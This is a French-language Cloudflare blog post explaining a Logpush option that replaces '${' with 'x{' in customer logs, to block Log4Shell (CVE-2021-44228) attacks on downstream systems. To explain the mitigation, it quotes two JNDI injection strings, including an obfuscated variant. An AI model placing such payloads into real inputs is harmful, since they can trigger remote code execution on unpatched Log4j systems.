Subscribe to receive notifications of new posts:

Subscription confirmed. Thank you for subscribing!

Assainissement des fichiers journaux Cloudflare pour protéger les clients contre la vulnérabilité Log4j

Loading...

2 min read

Le 9 décembre 2021, le monde a appris l'existence de CVE-2021-44228, une exploitation de vulnérabilité Zero Day affectant l'utilitaire Apache Log4j. Cloudflare a immédiatement mis à jour son pare-feu WAF pour contribuer à établir une protection contre cette vulnérabilité, mais nous recommandons à nos clients de mettre à jour leurs systèmes le plus rapidement possible.

Cependant, nous savons que de nombreux clients de Cloudflare consomment leurs fichiers journaux dans un logiciel qui utilise Log4j. Nous atténuons donc également toute tentative d'exploitation de la vulnérabilité via les fichiers journaux Cloudflare. Au moment de cette publication, nous observons jusqu'à 1000 fois par seconde le modèle d'exploitation de la vulnérabilité dans les fichiers journaux que nous transmettons aux clients.

Dès maintenant, les clients peuvent mettre à jour leurs tâches Logpush afin d'expurger automatiquement les jetons susceptibles de déclencher cette vulnérabilité. Vous pouvez en apprendre davantage à ce sujet dans notre documentation pour développeurs ou consulter les détails ci-dessous.

Comment fonctionne l'attaque

Vous pouvez en apprendre davantage plus sur le fonctionnement de la vulnérabilité de Log4j dans notre publication de blog. En résumé, l'auteur d'une attaque peut ajouter une expression comme ${jndi:ldap://exemple.com/a} dans n'importe quelle chaîne. Log4j établit alors une connexion sur Internet pour récupérer cet objet.

Les fichiers journaux Cloudflare contiennent de nombreux champs de chaînes contrôlés par les utilisateurs finaux sur l'Internet public, comme User Agent et le chemin d'URL. Avec cette vulnérabilité, il est possible qu'un utilisateur malveillant puisse provoquer une exécution de code à distance sur tout système lisant ces champs et utilisant une instance non corrigée de Log4j.

Notre plan d'atténuation

Malheureusement, la simple recherche d'un jeton comme ${jndi:ldap n'est pas suffisante pour offrir une protection contre cette vulnérabilité. En raison de l'expressivité du langage de modélisation, il est nécessaire de rechercher également les variantes masquées. Nous observons déjà des auteurs d'attaques qui utilisent des variantes comme ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}. Ainsi, l'expurgation du jeton ${ est le moyen le plus général de se défendre contre cette vulnérabilité.

Le jeton ${ apparaît jusqu'à 1000 fois par seconde dans les journaux que nous transmettons actuellement aux clients. Une vérification ponctuelle de certains enregistrements montre que beaucoup ne sont pas des tentatives d'exploitation de cette vulnérabilité. Par conséquent, nous ne pouvons pas expurger nos journaux en toute sécurité sans affecter les clients qui s'attendent à voir ce jeton dans leurs journaux.

Dès maintenant, les clients peuvent mettre à jour leurs tâches Logpush pour expurger la chaîne ${ et la remplacer systématiquement par x{.

Pour cela, les clients peuvent mettre à jour la configuration des options de leur tâche Logpush pour inclure le paramètre CVE-2021-44228=true. Pour des instructions détaillées sur la marche à suivre avec l'API Logpush, consultez l'exemple fourni dans notre documentation pour développeurs. Veuillez noter que cette option n'est actuellement pas disponible dans le tableau de bord Cloudflare et qu'elle peut uniquement être modifiée avec l'API.

Nous protégeons des réseaux d'entreprise entiers, aidons nos clients à développer efficacement des applications à l'échelle d'Internet, accélérons n'importe quel site web ou application Internet, repoussons les attaques DDoS, maintenons les pirates à distance et pouvons vous aider dans votre parcours vers le Zero Trust.

Rendez-vous sur 1.1.1.1 depuis n'importe quel appareil pour commencer à utiliser notre application gratuite, qui rend votre navigation Internet plus rapide et plus sûre.

Pour en savoir plus sur notre mission visant à bâtir un meilleur Internet, cliquez ici. Si vous cherchez de nouvelles perspectives professionnelles, consultez nos postes vacants.

Journaux Français Log4J (FR) Log4Shell (FR) Cloudflare Zero Trust (FR)

Follow on Twitter

Jon Levine |@jplevine
Cloudflare |Cloudflare

Related Posts

March 14, 2022 12:59PM

Tirer parti du SIEM QRadar d'IBM pour extraire des informations des journaux Cloudflare

Nous sommes heureux d'annoncer que les clients de Cloudflare sont désormais en mesure d'envoyer leurs journaux directement vers le SIEM IBM Security QRadar. Cette intégration directe permet d'économiser sur les coûts et d'accélérer la transmission des journaux pour les clients de Cloudflare...